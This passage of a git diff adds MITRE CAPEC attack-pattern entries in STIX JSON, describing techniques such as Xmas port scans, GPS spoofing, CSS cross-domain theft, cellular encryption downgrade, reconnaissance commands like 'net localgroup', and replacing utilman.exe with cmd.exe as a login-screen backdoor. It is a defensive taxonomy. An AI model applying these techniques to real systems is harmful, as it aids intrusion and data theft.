correctly handle the complete range of data allowed by the schema." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02.json b/capec/attack-pattern/attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02.json new file mode 100644 index 0000000000..b5e885b4d0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--c54f6319-191d-4174-a3bf-2df152896d44", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Detect Unpublicized Web Pages", + "description": "An attacker searches a targeted web site for web pages that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging pages, or otherwise predictable pages within the site tree. For example, if an attacker might be able to notice a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked. Using this, the attacker may be able to gain access to information that the targeted site did not intend to make public.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/143.html", + "external_id": "CAPEC-143" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa.json b/capec/attack-pattern/attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa.json new file mode 100644 index 0000000000..947dad22b6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--a5f9c431-ada1-4ec5-afa5-e2761f0a1454", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Xmas Scan", + "description": "An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the all flags sent in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed when compared with other types of scans, its major advantage is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. XMAS scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/303.html", + "external_id": "CAPEC-303" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary needs logical access to the target network. XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges." + ], + "x_capec_resources_required": [ + "This attack can be carried out with a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9.json b/capec/attack-pattern/attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9.json new file mode 100644 index 0000000000..05f4bbffb2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--f4fa7ded-0474-40db-b780-963967e1ad00", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Carry-Off GPS Attack", + "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/628.html", + "external_id": "CAPEC-628" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing", + "external_id": "REF-489" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced knoweldge in GPS technology." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--442a3623-a733-48da-8145-68c7d0b31f99.json b/capec/attack-pattern/attack-pattern--442a3623-a733-48da-8145-68c7d0b31f99.json new file mode 100644 index 0000000000..df8c930343 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--442a3623-a733-48da-8145-68c7d0b31f99.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--67399035-6fd7-428f-9f7f-860c9766d92a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--442a3623-a733-48da-8145-68c7d0b31f99", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Registry Manipulation", + "description": "This pattern has been deprecated as it was determined to be a duplicate of another pattern. Please refer to the pattern CAPEC-203 : Manipulate Application Registry Values going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/269.html", + "external_id": "CAPEC-269" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9.json b/capec/attack-pattern/attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9.json new file mode 100644 index 0000000000..5d46f86656 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a9e37e97-4d92-4d0d-a3a1-b990b95edcc9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Liking", + "description": "The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate his or herself with the target via actions, appearance, or a combination thereof.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/423.html", + "external_id": "CAPEC-423" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--44511f13-daab-4244-b38b-054b69cfde3f.json b/capec/attack-pattern/attack-pattern--44511f13-daab-4244-b38b-054b69cfde3f.json new file mode 100644 index 0000000000..e522d85183 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--44511f13-daab-4244-b38b-054b69cfde3f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--85418407-2032-4fc8-a1a0-070f06fa3877", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--44511f13-daab-4244-b38b-054b69cfde3f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: ICMP Echo Request Ping", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-285\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/288.html", + "external_id": "CAPEC-288" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2.json b/capec/attack-pattern/attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2.json new file mode 100644 index 0000000000..7651af485a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--74054b0c-7aa8-4c06-ae49-7411a21d5124", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Generic Cross-Browser Cross-Domain Theft", + "description": "An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \"does not make sense\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/468.html", + "external_id": "CAPEC-468" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/149.html", + "external_id": "CWE-149" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html", + "external_id": "CWE-177" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/838.html", + "external_id": "CWE-838" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Chris Evans, Generic cross-browser cross-domain theft, 2009--12---28", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html", + "external_id": "REF-405" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \" and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string" + ], + "x_capec_resources_required": [ + "Attacker controlled site/page to render a page referencing the injected CSS string" + ], + "x_capec_skills_required": { + "High": "Ability to craft a CSS injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204.json b/capec/attack-pattern/attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204.json new file mode 100644 index 0000000000..14b35c2bf5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4c3b2460-af2d-4401-9210-012fa127f312", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Weakening of Cellular Encryption", + "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/606.html", + "external_id": "CAPEC-606" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html", + "external_id": "CWE-757" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Other (Tracking, Network Reconnaissance)" + ] + }, + "x_capec_prerequisites": [ + "Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks." + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4561bef5-b0e0-4e24-a585-9ad8edb8d007.json b/capec/attack-pattern/attack-pattern--4561bef5-b0e0-4e24-a585-9ad8edb8d007.json new file mode 100644 index 0000000000..64949a6295 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4561bef5-b0e0-4e24-a585-9ad8edb8d007.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--1024adc5-054b-4252-9325-b86efbee25c1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4561bef5-b0e0-4e24-a585-9ad8edb8d007", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Replace Trusted Executable", + "description": "An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html", + "external_id": "CAPEC-558" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \"C:\\Windows\\System32\\utilman.exe\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--45f4a2c0-545b-46d0-97c1-eb7076100c8e.json b/capec/attack-pattern/attack-pattern--45f4a2c0-545b-46d0-97c1-eb7076100c8e.json new file mode 100644 index 0000000000..7058578ebb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--45f4a2c0-545b-46d0-97c1-eb7076100c8e.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--d890a5f0-4458-40bf-b02c-3d4a50ad9df6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--45f4a2c0-545b-46d0-97c1-eb7076100c8e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Network Topology Mapping", + "description": "An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/309.html", + "external_id": "CAPEC-309" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_resources_required": [ + "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1.json b/capec/attack-pattern/attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1.json new file mode 100644 index 0000000000..d389668531 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--e4a2c6dc-abf9-48bd-90ff-3f4f178a4cd6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html", + "external_id": "CAPEC-621" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f.json b/capec/attack-pattern/attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f.json new file mode 100644 index 0000000000..e09099acaa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a2970121-3c42-485e-a0b7-2a653cb0d862", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Services Footprinting", + "description": "An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. Depending on the operating system, commands that can obtain services information include \"sc\" and \"tasklist/svc\" using Tasklist, and \"net start\" using Net.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/574.html", + "external_id": "CAPEC-574" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df.json b/capec/attack-pattern/attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df.json new file mode 100644 index 0000000000..f0299f222f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--d1dfca45-8690-4064-9926-b33195671aeb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Group Permission Footprinting", + "description": "An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command which can list local groups is \"net localgroup\".", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/576.html", + "external_id": "CAPEC-576" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3.json b/capec/attack-pattern/attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3.json new file mode 100644 index 0000000000..da3ec937f3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3.json @@ -0,0 +1,175 @@ +{ + "type": "bundle", + "id": "bundle--036906a3-7d66-4fca-9a8f-b3771b3e04d6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Using UTF-8 Encoding to Bypass Validation Logic", + "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in 